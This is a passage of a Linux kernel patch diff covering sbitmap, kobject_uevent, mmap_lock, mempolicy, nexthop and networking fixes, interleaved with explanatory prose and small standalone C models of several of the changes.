+@@ -196,6 +200,7 @@ void hardlockup_detector_perf_enable(void)
+ 	if (!atomic_fetch_inc(&watchdog_cpus))
+ 		pr_info("Enabled. Permanently consumes one hw-PMU counter.\n");
+ 
++	watchdog_init_timestamp();
+ 	perf_event_enable(this_cpu_read(watchdog_ev));
+ }
+ 
+diff --git a/lib/decompress_bunzip2.c b/lib/decompress_bunzip2.c
+index 3518e7394eca8..ca736166f1000 100644
+--- a/lib/decompress_bunzip2.c
++++ b/lib/decompress_bunzip2.c
+@@ -232,7 +232,8 @@ static int INIT get_next_block(struct bunzip_data *bd)
+ 	   RUNB) */
+ 	symCount = symTotal+2;
+ 	for (j = 0; j < groupCount; j++) {
+-		unsigned char length[MAX_SYMBOLS], temp[MAX_HUFCODE_BITS+1];
++		unsigned char length[MAX_SYMBOLS];
++		unsigned short temp[MAX_HUFCODE_BITS+1];
+ 		int	minLen,	maxLen, pp;
+ 		/* Read Huffman code lengths for each symbol.  They're
+ 		   stored in a way similar to mtf; record a starting
+diff --git a/lib/kobject_uevent.c b/lib/kobject_uevent.c
+index 7c44b7ae4c5c3..d397b1ad5ccf0 100644
+--- a/lib/kobject_uevent.c
++++ b/lib/kobject_uevent.c
+@@ -432,8 +432,23 @@ static void zap_modalias_env(struct kobj_uevent_env *env)
+ 		len = strlen(env->envp[i]) + 1;
+ 
+ 		if (i != env->envp_idx - 1) {
++			/* @env->envp[] contains pointers to @env->buf[]
++			 * with @env->buflen chars, and we are removing
++			 * variable MODALIAS here pointed by @env->envp[i]
++			 * variable MODALIAS, pointed to by @env->envp[i],
++			 *
++			 * 0               @env->buf[]      @env->buflen
++			 * ---------------------------------------------
++			 * ^             ^              ^              ^
++			 * |             |->   @len   <-| target block |
++			 * @env->envp[0] @env->envp[i]  @env->envp[i + 1]
++			 *
++			 * so the "target block" indicated above is moved
++			 * backward by @len, and its correct size is
++			 * @env->buflen - (@env->envp[i + 1] - @env->envp[0]).
++			 */
+ 			memmove(env->envp[i], env->envp[i + 1],
+-				env->buflen - len);
++				env->buflen - (env->envp[i + 1] - env->envp[0]));
+ 
+ 			for (j = i; j < env->envp_idx - 1; j++)
+ 				env->envp[j] = env->envp[j + 1] - len;
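
The bug fixed above is easiest to see with the block sizes written out:
the region to move starts at the *next* entry and runs to the end of the
used buffer, so its size is buflen minus that entry's offset; moving
buflen - len bytes, as the old code did, read past the used region. A
standalone model of the corrected removal over a packed "key=value\0..."
buffer (remove_env() is an illustrative helper, and envp[0] is assumed to
point at the start of the buffer, as in the kernel structure):

#include <string.h>

static void remove_env(char **envp, int *envp_idx, size_t *buflen, int i)
{
	size_t len = strlen(envp[i]) + 1;	/* entry plus its NUL */

	if (i != *envp_idx - 1) {
		/* Bytes from the next entry to the end of used space. */
		size_t tail = *buflen - (size_t)(envp[i + 1] - envp[0]);

		memmove(envp[i], envp[i + 1], tail);

		for (int j = i; j < *envp_idx - 1; j++)
			envp[j] = envp[j + 1] - len;
	}
	(*envp_idx)--;
	*buflen -= len;
}
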
+diff --git a/lib/objagg.c b/lib/objagg.c
+index 1e248629ed643..1608895b009c8 100644
+--- a/lib/objagg.c
++++ b/lib/objagg.c
+@@ -167,6 +167,9 @@ static int objagg_obj_parent_assign(struct objagg *objagg,
+ {
+ 	void *delta_priv;
+ 
++	if (WARN_ON(!objagg_obj_is_root(parent)))
++		return -EINVAL;
++
+ 	delta_priv = objagg->ops->delta_create(objagg->priv, parent->obj,
+ 					       objagg_obj->obj);
+ 	if (IS_ERR(delta_priv))
+@@ -903,20 +906,6 @@ static const struct objagg_opt_algo *objagg_opt_algos[] = {
+ 	[OBJAGG_OPT_ALGO_SIMPLE_GREEDY] = &objagg_opt_simple_greedy,
+ };
+ 
+-static int objagg_hints_obj_cmp(struct rhashtable_compare_arg *arg,
+-				const void *obj)
+-{
+-	struct rhashtable *ht = arg->ht;
+-	struct objagg_hints *objagg_hints =
+-			container_of(ht, struct objagg_hints, node_ht);
+-	const struct objagg_ops *ops = objagg_hints->ops;
+-	const char *ptr = obj;
+-
+-	ptr += ht->p.key_offset;
+-	return ops->hints_obj_cmp ? ops->hints_obj_cmp(ptr, arg->key) :
+-				    memcmp(ptr, arg->key, ht->p.key_len);
+-}
+-
+ /**
+  * objagg_hints_get - obtains hints instance
+  * @objagg:		objagg instance
+@@ -955,7 +944,6 @@ struct objagg_hints *objagg_hints_get(struct objagg *objagg,
+ 				offsetof(struct objagg_hints_node, obj);
+ 	objagg_hints->ht_params.head_offset =
+ 				offsetof(struct objagg_hints_node, ht_node);
+-	objagg_hints->ht_params.obj_cmpfn = objagg_hints_obj_cmp;
+ 
+ 	err = rhashtable_init(&objagg_hints->node_ht, &objagg_hints->ht_params);
+ 	if (err)
+diff --git a/lib/sbitmap.c b/lib/sbitmap.c
+index c515072eca296..61075535a8073 100644
+--- a/lib/sbitmap.c
++++ b/lib/sbitmap.c
+@@ -60,12 +60,30 @@ static inline void update_alloc_hint_after_get(struct sbitmap *sb,
+ /*
+  * See if we have deferred clears that we can batch move
+  */
+-static inline bool sbitmap_deferred_clear(struct sbitmap_word *map)
++static inline bool sbitmap_deferred_clear(struct sbitmap_word *map,
++		unsigned int depth, unsigned int alloc_hint, bool wrap)
+ {
+-	unsigned long mask;
++	unsigned long mask, word_mask;
+ 
+-	if (!READ_ONCE(map->cleared))
+-		return false;
++	guard(spinlock_irqsave)(&map->swap_lock);
++
++	if (!map->cleared) {
++		if (depth == 0)
++			return false;
++
++		word_mask = (~0UL) >> (BITS_PER_LONG - depth);
++		/*
++		 * The current behavior is to always retry after moving
++		 * ->cleared to word, and we change it to retry in case
++		 * of any free bits. To avoid an infinite loop, we need
++		 * to take wrap & alloc_hint into account, otherwise a
++		 * soft lockup may occur.
++		 */
++		if (!wrap && alloc_hint)
++			word_mask &= ~((1UL << alloc_hint) - 1);
++
++		return (READ_ONCE(map->word) & word_mask) != word_mask;
++	}
+ 
+ 	/*
+ 	 * First get a stable cleared mask, setting the old mask to 0.
+@@ -85,6 +103,7 @@ int sbitmap_init_node(struct sbitmap *sb, unsigned int depth, int shift,
+ 		      bool alloc_hint)
+ {
+ 	unsigned int bits_per_word;
++	int i;
+ 
+ 	if (shift < 0)
+ 		shift = sbitmap_calculate_shift(depth);
+@@ -116,6 +135,9 @@ int sbitmap_init_node(struct sbitmap *sb, unsigned int depth, int shift,
+ 		return -ENOMEM;
+ 	}
+ 
++	for (i = 0; i < sb->map_nr; i++)
++		spin_lock_init(&sb->map[i].swap_lock);
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_init_node);
+@@ -126,7 +148,7 @@ void sbitmap_resize(struct sbitmap *sb, unsigned int depth)
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < sb->map_nr; i++)
+-		sbitmap_deferred_clear(&sb->map[i]);
++		sbitmap_deferred_clear(&sb->map[i], 0, 0, 0);
+ 
+ 	sb->depth = depth;
+ 	sb->map_nr = DIV_ROUND_UP(sb->depth, bits_per_word);
+@@ -167,18 +189,19 @@ static int __sbitmap_get_word(unsigned long *word, unsigned long depth,
+ 	return nr;
+ }
+ 
+-static int sbitmap_find_bit_in_index(struct sbitmap *sb, int index,
+-				     unsigned int alloc_hint)
++static int sbitmap_find_bit_in_word(struct sbitmap_word *map,
++				    unsigned int depth,
++				    unsigned int alloc_hint,
++				    bool wrap)
+ {
+-	struct sbitmap_word *map = &sb->map[index];
+ 	int nr;
+ 
+ 	do {
+-		nr = __sbitmap_get_word(&map->word, __map_depth(sb, index),
+-					alloc_hint, !sb->round_robin);
++		nr = __sbitmap_get_word(&map->word, depth,
++					alloc_hint, wrap);
+ 		if (nr != -1)
+ 			break;
+-		if (!sbitmap_deferred_clear(map))
++		if (!sbitmap_deferred_clear(map, depth, alloc_hint, wrap))
+ 			break;
+ 	} while (1);
+ 
+@@ -203,7 +226,9 @@ static int __sbitmap_get(struct sbitmap *sb, unsigned int alloc_hint)
+ 		alloc_hint = 0;
+ 
+ 	for (i = 0; i < sb->map_nr; i++) {
+-		nr = sbitmap_find_bit_in_index(sb, index, alloc_hint);
++		nr = sbitmap_find_bit_in_word(&sb->map[index],
++					      __map_depth(sb, index),
++					      alloc_hint, !sb->round_robin);
+ 		if (nr != -1) {
+ 			nr += index << sb->shift;
+ 			break;
+@@ -243,30 +268,24 @@ static int __sbitmap_get_shallow(struct sbitmap *sb,
+ 	int nr = -1;
+ 
+ 	index = SB_NR_TO_INDEX(sb, alloc_hint);
++	alloc_hint = SB_NR_TO_BIT(sb, alloc_hint);
+ 
+ 	for (i = 0; i < sb->map_nr; i++) {
+-again:
+-		nr = __sbitmap_get_word(&sb->map[index].word,
+-					min_t(unsigned int,
+-					      __map_depth(sb, index),
+-					      shallow_depth),
+-					SB_NR_TO_BIT(sb, alloc_hint), true);
++		nr = sbitmap_find_bit_in_word(&sb->map[index],
++					      min_t(unsigned int,
++						    __map_depth(sb, index),
++						    shallow_depth),
++					      alloc_hint, true);
++
+ 		if (nr != -1) {
+ 			nr += index << sb->shift;
+ 			break;
+ 		}
+ 
+-		if (sbitmap_deferred_clear(&sb->map[index]))
+-			goto again;
+-
+ 		/* Jump to next index. */
+-		index++;
+-		alloc_hint = index << sb->shift;
+-
+-		if (index >= sb->map_nr) {
++		alloc_hint = 0;
++		if (++index >= sb->map_nr)
+ 			index = 0;
+-			alloc_hint = 0;
+-		}
+ 	}
+ 
+ 	return nr;
+@@ -506,18 +525,18 @@ unsigned long __sbitmap_queue_get_batch(struct sbitmap_queue *sbq, int nr_tags,
+ 		struct sbitmap_word *map = &sb->map[index];
+ 		unsigned long get_mask;
+ 		unsigned int map_depth = __map_depth(sb, index);
++		unsigned long val;
+ 
+-		sbitmap_deferred_clear(map);
+-		if (map->word == (1UL << (map_depth - 1)) - 1)
++		sbitmap_deferred_clear(map, 0, 0, 0);
++		val = READ_ONCE(map->word);
++		if (val == (1UL << (map_depth - 1)) - 1)
+ 			goto next;
+ 
+-		nr = find_first_zero_bit(&map->word, map_depth);
++		nr = find_first_zero_bit(&val, map_depth);
+ 		if (nr + nr_tags <= map_depth) {
+ 			atomic_long_t *ptr = (atomic_long_t *) &map->word;
+-			unsigned long val;
+ 
+ 			get_mask = ((1UL << nr_tags) - 1) << nr;
+-			val = READ_ONCE(map->word);
+ 			while (!atomic_long_try_cmpxchg(ptr, &val,
+ 							  get_mask | val))
+ 				;
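
Under the new swap_lock, the batch move itself keeps its two-step shape:
atomically steal the whole cleared mask, then drop those bits from the
allocation word. A C11 model of the two steps (the kernel additionally
holds map->swap_lock across them and, when there is nothing to clear, now
reports whether any bits are still free instead of always giving up):

#include <stdatomic.h>
#include <stdbool.h>

struct word_map {
	atomic_ulong word;	/* allocated bits */
	atomic_ulong cleared;	/* bits freed since the last batch move */
};

static bool deferred_clear(struct word_map *m)
{
	/* Steal the cleared mask so every freed bit is folded back
	 * exactly once, even against concurrent clearers. */
	unsigned long mask = atomic_exchange(&m->cleared, 0UL);

	if (!mask)
		return false;

	/* Hand the stolen bits back to the allocation word. */
	atomic_fetch_and(&m->word, ~mask);
	return true;
}
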
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 87a14638fad09..05b8797163b2b 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -4353,7 +4353,7 @@ void __init hugetlb_add_hstate(unsigned int order)
+ 	BUG_ON(hugetlb_max_hstate >= HUGE_MAX_HSTATE);
+ 	BUG_ON(order == 0);
+ 	h = &hstates[hugetlb_max_hstate++];
+-	mutex_init(&h->resize_lock);
++	__mutex_init(&h->resize_lock, "resize mutex", &h->resize_key);
+ 	h->order = order;
+ 	h->mask = ~(huge_page_size(h) - 1);
+ 	for (i = 0; i < MAX_NUMNODES; ++i)
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index 84e11c2caae42..399d8cb488138 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -3112,8 +3112,9 @@ int mpol_parse_str(char *str, struct mempolicy **mpol)
+  * @pol:  pointer to mempolicy to be formatted
+  *
+  * Convert @pol into a string.  If @buffer is too short, truncate the string.
+- * Recommend a @maxlen of at least 32 for the longest mode, "interleave", the
+- * longest flag, "relative", and to display at least a few node ids.
++ * Recommend a @maxlen of at least 51 for the longest mode, "weighted
++ * interleave", plus the longest flags, "relative|balancing", and to
++ * display at least a few node ids.
+  */
+ void mpol_to_str(char *buffer, int maxlen, struct mempolicy *pol)
+ {
+@@ -3122,7 +3123,10 @@ void mpol_to_str(char *buffer, int maxlen, struct mempolicy *pol)
+ 	unsigned short mode = MPOL_DEFAULT;
+ 	unsigned short flags = 0;
+ 
+-	if (pol && pol != &default_policy && !(pol->flags & MPOL_F_MORON)) {
++	if (pol &&
++	    pol != &default_policy &&
++	    !(pol >= &preferred_node_policy[0] &&
++	      pol <= &preferred_node_policy[ARRAY_SIZE(preferred_node_policy) - 1])) {
+ 		mode = pol->mode;
+ 		flags = pol->flags;
+ 	}
+@@ -3149,12 +3153,18 @@ void mpol_to_str(char *buffer, int maxlen, struct mempolicy *pol)
+ 		p += snprintf(p, buffer + maxlen - p, "=");
+ 
+ 		/*
+-		 * Currently, the only defined flags are mutually exclusive
++		 * Static and relative are mutually exclusive.
+ 		 */
+ 		if (flags & MPOL_F_STATIC_NODES)
+ 			p += snprintf(p, buffer + maxlen - p, "static");
+ 		else if (flags & MPOL_F_RELATIVE_NODES)
+ 			p += snprintf(p, buffer + maxlen - p, "relative");
++
++		if (flags & MPOL_F_NUMA_BALANCING) {
++			if (!is_power_of_2(flags & MPOL_MODE_FLAGS))
++				p += snprintf(p, buffer + maxlen - p, "|");
++			p += snprintf(p, buffer + maxlen - p, "balancing");
++		}
+ 	}
+ 
+ 	if (!nodes_empty(nodes))
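
The emission rule above: "static" and "relative" are mutually exclusive,
"balancing" may combine with either, and the '|' separator is printed only
when balancing is not the sole flag, which is what the is_power_of_2()
test detects. A compact sketch with illustrative flag constants, assuming
the buffer is large enough, as the recommended @maxlen guarantees:

#include <stdio.h>

#define F_STATIC	0x1	/* illustrative stand-ins for the */
#define F_RELATIVE	0x2	/* MPOL_F_* mode flags            */
#define F_BALANCING	0x4

static void flags_to_str(char *p, char *end, unsigned int flags)
{
	if (flags & F_STATIC)
		p += snprintf(p, end - p, "static");
	else if (flags & F_RELATIVE)
		p += snprintf(p, end - p, "relative");

	if (flags & F_BALANCING) {
		/* Separator only when balancing joins another flag. */
		if (flags & (F_STATIC | F_RELATIVE))
			p += snprintf(p, end - p, "|");
		snprintf(p, end - p, "balancing");
	}
}
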
+diff --git a/mm/mmap_lock.c b/mm/mmap_lock.c
+index 1854850b4b897..368b840e75082 100644
+--- a/mm/mmap_lock.c
++++ b/mm/mmap_lock.c
+@@ -19,14 +19,7 @@ EXPORT_TRACEPOINT_SYMBOL(mmap_lock_released);
+ 
+ #ifdef CONFIG_MEMCG
+ 
+-/*
+- * Our various events all share the same buffer (because we don't want or need
+- * to allocate a set of buffers *per event type*), so we need to protect against
+- * concurrent _reg() and _unreg() calls, and count how many _reg() calls have
+- * been made.
+- */
+-static DEFINE_MUTEX(reg_lock);
+-static int reg_refcount; /* Protected by reg_lock. */
++static atomic_t reg_refcount;
+ 
+ /*
+  * Size of the buffer for memcg path names. Ignoring stack trace support,
+@@ -34,136 +27,22 @@ static int reg_refcount; /* Protected by reg_lock. */
+  */
+ #define MEMCG_PATH_BUF_SIZE MAX_FILTER_STR_VAL
+ 
+-/*
+- * How many contexts our trace events might be called in: normal, softirq, irq,
+- * and NMI.
+- */
+-#define CONTEXT_COUNT 4
+-
+-struct memcg_path {
+-	local_lock_t lock;
+-	char __rcu *buf;
+-	local_t buf_idx;
+-};
+-static DEFINE_PER_CPU(struct memcg_path, memcg_paths) = {
+-	.lock = INIT_LOCAL_LOCK(lock),
+-	.buf_idx = LOCAL_INIT(0),
+-};
+-
+-static char **tmp_bufs;
+-
+-/* Called with reg_lock held. */
+-static void free_memcg_path_bufs(void)
+-{
+-	struct memcg_path *memcg_path;
+-	int cpu;
+-	char **old = tmp_bufs;
+-
+-	for_each_possible_cpu(cpu) {
+-		memcg_path = per_cpu_ptr(&memcg_paths, cpu);
+-		*(old++) = rcu_dereference_protected(memcg_path->buf,
+-			lockdep_is_held(&reg_lock));
+-		rcu_assign_pointer(memcg_path->buf, NULL);
+-	}
+-
+-	/* Wait for inflight memcg_path_buf users to finish. */
+-	synchronize_rcu();
+-
+-	old = tmp_bufs;
+-	for_each_possible_cpu(cpu) {
+-		kfree(*(old++));
+-	}
+-
+-	kfree(tmp_bufs);
+-	tmp_bufs = NULL;
+-}
+-
+ int trace_mmap_lock_reg(void)
+ {
+-	int cpu;
+-	char *new;
+-
+-	mutex_lock(&reg_lock);
+-
+-	/* If the refcount is going 0->1, proceed with allocating buffers. */
+-	if (reg_refcount++)
+-		goto out;
+-
+-	tmp_bufs = kmalloc_array(num_possible_cpus(), sizeof(*tmp_bufs),
+-				 GFP_KERNEL);
+-	if (tmp_bufs == NULL)
+-		goto out_fail;
+-
+-	for_each_possible_cpu(cpu) {
+-		new = kmalloc(MEMCG_PATH_BUF_SIZE * CONTEXT_COUNT, GFP_KERNEL);
+-		if (new == NULL)
+-			goto out_fail_free;
+-		rcu_assign_pointer(per_cpu_ptr(&memcg_paths, cpu)->buf, new);
+-		/* Don't need to wait for inflights, they'd have gotten NULL. */
+-	}
+-
+-out:
+-	mutex_unlock(&reg_lock);
++	atomic_inc(&reg_refcount);
+ 	return 0;
+-
+-out_fail_free:
+-	free_memcg_path_bufs();
+-out_fail:
+-	/* Since we failed, undo the earlier ref increment. */
+-	--reg_refcount;
+-
+-	mutex_unlock(&reg_lock);
+-	return -ENOMEM;
+ }
+ 
+ void trace_mmap_lock_unreg(void)
+ {
+-	mutex_lock(&reg_lock);
+-
+-	/* If the refcount is going 1->0, proceed with freeing buffers. */
+-	if (--reg_refcount)
+-		goto out;
+-
+-	free_memcg_path_bufs();
+-
+-out:
+-	mutex_unlock(&reg_lock);
+-}
+-
+-static inline char *get_memcg_path_buf(void)
+-{
+-	struct memcg_path *memcg_path = this_cpu_ptr(&memcg_paths);
+-	char *buf;
+-	int idx;
+-
+-	rcu_read_lock();
+-	buf = rcu_dereference(memcg_path->buf);
+-	if (buf == NULL) {
+-		rcu_read_unlock();
+-		return NULL;
+-	}
+-	idx = local_add_return(MEMCG_PATH_BUF_SIZE, &memcg_path->buf_idx) -
+-	      MEMCG_PATH_BUF_SIZE;
+-	return &buf[idx];
++	atomic_dec(&reg_refcount);
+ }
+ 
+-static inline void put_memcg_path_buf(void)
+-{
+-	local_sub(MEMCG_PATH_BUF_SIZE, &this_cpu_ptr(&memcg_paths)->buf_idx);
+-	rcu_read_unlock();
+-}
+-
+-#define TRACE_MMAP_LOCK_EVENT(type, mm, ...)                                   \
+-	do {                                                                   \
+-		const char *memcg_path;                                        \
+-		local_lock(&memcg_paths.lock);                                 \
+-		memcg_path = get_mm_memcg_path(mm);                            \
+-		trace_mmap_lock_##type(mm,                                     \
+-				       memcg_path != NULL ? memcg_path : "",   \
+-				       ##__VA_ARGS__);                         \
+-		if (likely(memcg_path != NULL))                                \
+-			put_memcg_path_buf();                                  \
+-		local_unlock(&memcg_paths.lock);                               \
++#define TRACE_MMAP_LOCK_EVENT(type, mm, ...)                    \
++	do {                                                    \
++		char buf[MEMCG_PATH_BUF_SIZE];                  \
++		get_mm_memcg_path(mm, buf, sizeof(buf));        \
++		trace_mmap_lock_##type(mm, buf, ##__VA_ARGS__); \
+ 	} while (0)
+ 
+ #else /* !CONFIG_MEMCG */
+@@ -185,37 +64,23 @@ void trace_mmap_lock_unreg(void)
+ #ifdef CONFIG_TRACING
+ #ifdef CONFIG_MEMCG
+ /*
+- * Write the given mm_struct's memcg path to a percpu buffer, and return a
+- * pointer to it. If the path cannot be determined, or no buffer was available
+- * (because the trace event is being unregistered), NULL is returned.
+- *
+- * Note: buffers are allocated per-cpu to avoid locking, so preemption must be
+- * disabled by the caller before calling us, and re-enabled only after the
+- * caller is done with the pointer.
+- *
+- * The caller must call put_memcg_path_buf() once the buffer is no longer
+- * needed. This must be done while preemption is still disabled.
++ * Write the given mm_struct's memcg path to a buffer. If the path cannot be
++ * determined or the trace event is being unregistered, an empty string is written.
+  */
+-static const char *get_mm_memcg_path(struct mm_struct *mm)
++static void get_mm_memcg_path(struct mm_struct *mm, char *buf, size_t buflen)
+ {
+-	char *buf = NULL;
+-	struct mem_cgroup *memcg = get_mem_cgroup_from_mm(mm);
++	struct mem_cgroup *memcg;
+ 
++	buf[0] = '\0';
++	/* No need to get path if no trace event is registered. */
++	if (!atomic_read(&reg_refcount))
++		return;
++	memcg = get_mem_cgroup_from_mm(mm);
+ 	if (memcg == NULL)
+-		goto out;
+-	if (unlikely(memcg->css.cgroup == NULL))
+-		goto out_put;
+-
+-	buf = get_memcg_path_buf();
+-	if (buf == NULL)
+-		goto out_put;
+-
+-	cgroup_path(memcg->css.cgroup, buf, MEMCG_PATH_BUF_SIZE);
+-
+-out_put:
++		return;
++	if (memcg->css.cgroup)
++		cgroup_path(memcg->css.cgroup, buf, buflen);
+ 	css_put(&memcg->css);
+-out:
+-	return buf;
+ }
+ 
+ #endif /* CONFIG_MEMCG */
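
The mmap_lock rewrite above trades the mutex-guarded refcount plus per-cpu RCU-managed buffers for a bare atomic counter that get_mm_memcg_path() merely samples as an "any listeners?" hint, writing into an on-stack buffer per event. A rough userspace analog of that counter, using C11 atomics (function names are invented):

    #include <stdatomic.h>
    #include <stdio.h>

    static atomic_int reg_refcount;   /* mirrors the new atomic_t */

    static void trace_reg(void)   { atomic_fetch_add(&reg_refcount, 1); }
    static void trace_unreg(void) { atomic_fetch_sub(&reg_refcount, 1); }

    static void emit_event(void)
    {
        /* Cheap early-out: skip the path lookup when nobody listens.
         * A racy read is fine; the worst case is one wasted lookup. */
        if (!atomic_load(&reg_refcount))
            return;
        printf("would resolve the memcg path here\n");
    }

    int main(void)
    {
        emit_event();    /* nothing registered: no-op */
        trace_reg();
        emit_event();    /* does the work */
        trace_unreg();
        return 0;
    }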
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index a3b1d8e5dbb3d..4cd0cbf9c1212 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -5065,7 +5065,6 @@ static int evict_folios(struct lruvec *lruvec, struct scan_control *sc, int swap
+ 
+ 		/* retry folios that may have missed folio_rotate_reclaimable() */
+ 		list_move(&folio->lru, &clean);
+-		sc->nr_scanned -= folio_nr_pages(folio);
+ 	}
+ 
+ 	spin_lock_irq(&lruvec->lru_lock);
+diff --git a/net/bridge/br_forward.c b/net/bridge/br_forward.c
+index 9661698e86e40..a32d73f381558 100644
+--- a/net/bridge/br_forward.c
++++ b/net/bridge/br_forward.c
+@@ -25,8 +25,8 @@ static inline int should_deliver(const struct net_bridge_port *p,
+ 
+ 	vg = nbp_vlan_group_rcu(p);
+ 	return ((p->flags & BR_HAIRPIN_MODE) || skb->dev != p->dev) &&
+-		p->state == BR_STATE_FORWARDING && br_allowed_egress(vg, skb) &&
+-		nbp_switchdev_allowed_egress(p, skb) &&
++		(br_mst_is_enabled(p->br) || p->state == BR_STATE_FORWARDING) &&
++		br_allowed_egress(vg, skb) && nbp_switchdev_allowed_egress(p, skb) &&
+ 		!br_skb_isolated(p, skb);
+ }
+ 
+diff --git a/net/core/filter.c b/net/core/filter.c
+index dc89c34247187..210b881cb50b8 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -3518,13 +3518,20 @@ static int bpf_skb_net_grow(struct sk_buff *skb, u32 off, u32 len_diff,
+ 	if (skb_is_gso(skb)) {
+ 		struct skb_shared_info *shinfo = skb_shinfo(skb);
+ 
+-		/* Due to header grow, MSS needs to be downgraded. */
+-		if (!(flags & BPF_F_ADJ_ROOM_FIXED_GSO))
+-			skb_decrease_gso_size(shinfo, len_diff);
+-
+ 		/* Header must be checked, and gso_segs recomputed. */
+ 		shinfo->gso_type |= gso_type;
+ 		shinfo->gso_segs = 0;
++
++		/* Due to header growth, MSS needs to be downgraded.
++		 * There is a BUG_ON() when segmenting the frag_list with
++		 * head_frag true, so linearize the skb after downgrading
++		 * the MSS.
++		 */
++		if (!(flags & BPF_F_ADJ_ROOM_FIXED_GSO)) {
++			skb_decrease_gso_size(shinfo, len_diff);
++			if (shinfo->frag_list)
++				return skb_linearize(skb);
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c
+index 0c85c8a9e752f..fba8eb1bb2815 100644
+--- a/net/core/flow_dissector.c
++++ b/net/core/flow_dissector.c
+@@ -1013,7 +1013,7 @@ bool __skb_flow_dissect(const struct net *net,
+ 		}
+ 	}
+ 
+-	WARN_ON_ONCE(!net);
++	DEBUG_NET_WARN_ON_ONCE(!net);
+ 	if (net) {
+ 		enum netns_bpf_attach_type type = NETNS_BPF_FLOW_DISSECTOR;
+ 		struct bpf_prog_array *run_array;
+diff --git a/net/core/xdp.c b/net/core/xdp.c
+index c3f6653b42742..90de33b7c9ce3 100644
+--- a/net/core/xdp.c
++++ b/net/core/xdp.c
+@@ -124,10 +124,8 @@ void xdp_unreg_mem_model(struct xdp_mem_info *mem)
+ 		return;
+ 
+ 	if (type == MEM_TYPE_PAGE_POOL) {
+-		rcu_read_lock();
+-		xa = rhashtable_lookup(mem_id_ht, &id, mem_id_rht_params);
++		xa = rhashtable_lookup_fast(mem_id_ht, &id, mem_id_rht_params);
+ 		page_pool_destroy(xa->page_pool);
+-		rcu_read_unlock();
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(xdp_unreg_mem_model);
+diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
+index e2546961add3e..419969b268225 100644
+--- a/net/ipv4/esp4.c
++++ b/net/ipv4/esp4.c
+@@ -238,8 +238,7 @@ static int esp_output_tail_tcp(struct xfrm_state *x, struct sk_buff *skb)
+ #else
+ static int esp_output_tail_tcp(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	kfree_skb(skb);
+-
++	WARN_ON(1);
+ 	return -EOPNOTSUPP;
+ }
+ #endif
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index 5eb1b8d302bbd..e3268615a65a1 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -2270,6 +2270,15 @@ void fib_select_path(struct net *net, struct fib_result *res,
+ 		fib_select_default(fl4, res);
+ 
+ check_saddr:
+-	if (!fl4->saddr)
+-		fl4->saddr = fib_result_prefsrc(net, res);
++	if (!fl4->saddr) {
++		struct net_device *l3mdev;
++
++		l3mdev = dev_get_by_index_rcu(net, fl4->flowi4_l3mdev);
++
++		if (!l3mdev ||
++		    l3mdev_master_dev_rcu(FIB_RES_DEV(*res)) == l3mdev)
++			fl4->saddr = fib_result_prefsrc(net, res);
++		else
++			fl4->saddr = inet_select_addr(l3mdev, 0, RT_SCOPE_LINK);
++	}
+ }
+diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c
+index 9bdfdab906fe0..77b97c48da5ea 100644
+--- a/net/ipv4/fib_trie.c
++++ b/net/ipv4/fib_trie.c
+@@ -1628,6 +1628,7 @@ int fib_table_lookup(struct fib_table *tb, const struct flowi4 *flp,
+ 			res->nhc = nhc;
+ 			res->type = fa->fa_type;
+ 			res->scope = fi->fib_scope;
++			res->dscp = fa->fa_dscp;
+ 			res->fi = fi;
+ 			res->table = tb;
+ 			res->fa_head = &n->leaf;
+diff --git a/net/ipv4/nexthop.c b/net/ipv4/nexthop.c
+index be5498f5dd319..bba955d82f723 100644
+--- a/net/ipv4/nexthop.c
++++ b/net/ipv4/nexthop.c
+@@ -676,9 +676,10 @@ static int nla_put_nh_group(struct sk_buff *skb, struct nh_group *nhg)
+ 
+ 	p = nla_data(nla);
+ 	for (i = 0; i < nhg->num_nh; ++i) {
+-		p->id = nhg->nh_entries[i].nh->id;
+-		p->weight = nhg->nh_entries[i].weight - 1;
+-		p += 1;
++		*p++ = (struct nexthop_grp) {
++			.id = nhg->nh_entries[i].nh->id,
++			.weight = nhg->nh_entries[i].weight - 1,
++		};
+ 	}
+ 
+ 	if (nhg->resilient && nla_put_nh_group_res(skb, nhg))
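
The nexthop hunk above replaces member-by-member stores into the netlink attribute payload with assignment from a compound literal; C guarantees that members not named in the initializer (here the reserved fields) are zero-initialized, so no stale buffer bytes reach userspace. A small sketch of the difference (struct layout mirrors struct nexthop_grp and has no padding; padding behaviour in general is compiler-dependent):

    #include <stdio.h>
    #include <string.h>
    #include <stdint.h>

    struct grp {            /* shaped like struct nexthop_grp */
        uint32_t id;
        uint8_t  weight;
        uint8_t  resvd1;
        uint16_t resvd2;
    };

    int main(void)
    {
        struct grp g;
        size_t i;

        memset(&g, 0xff, sizeof(g));   /* stand-in for stale buffer contents */

        /* Old style leaked resvd1/resvd2: g.id = 1; g.weight = 0;
         * A compound literal zero-initialises every member not named. */
        g = (struct grp){ .id = 1, .weight = 0 };

        for (i = 0; i < sizeof(g); i++)
            printf("%02x ", ((unsigned char *)&g)[i]);
        printf("\n");                  /* 01 00 00 00 00 00 00 00 */
        return 0;
    }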
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index fcbacd39febe0..fda88894d0205 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -1275,7 +1275,7 @@ void ip_rt_get_source(u8 *addr, struct sk_buff *skb, struct rtable *rt)
+ 		struct flowi4 fl4 = {
+ 			.daddr = iph->daddr,
+ 			.saddr = iph->saddr,
+-			.flowi4_tos = RT_TOS(iph->tos),
++			.flowi4_tos = iph->tos & IPTOS_RT_MASK,
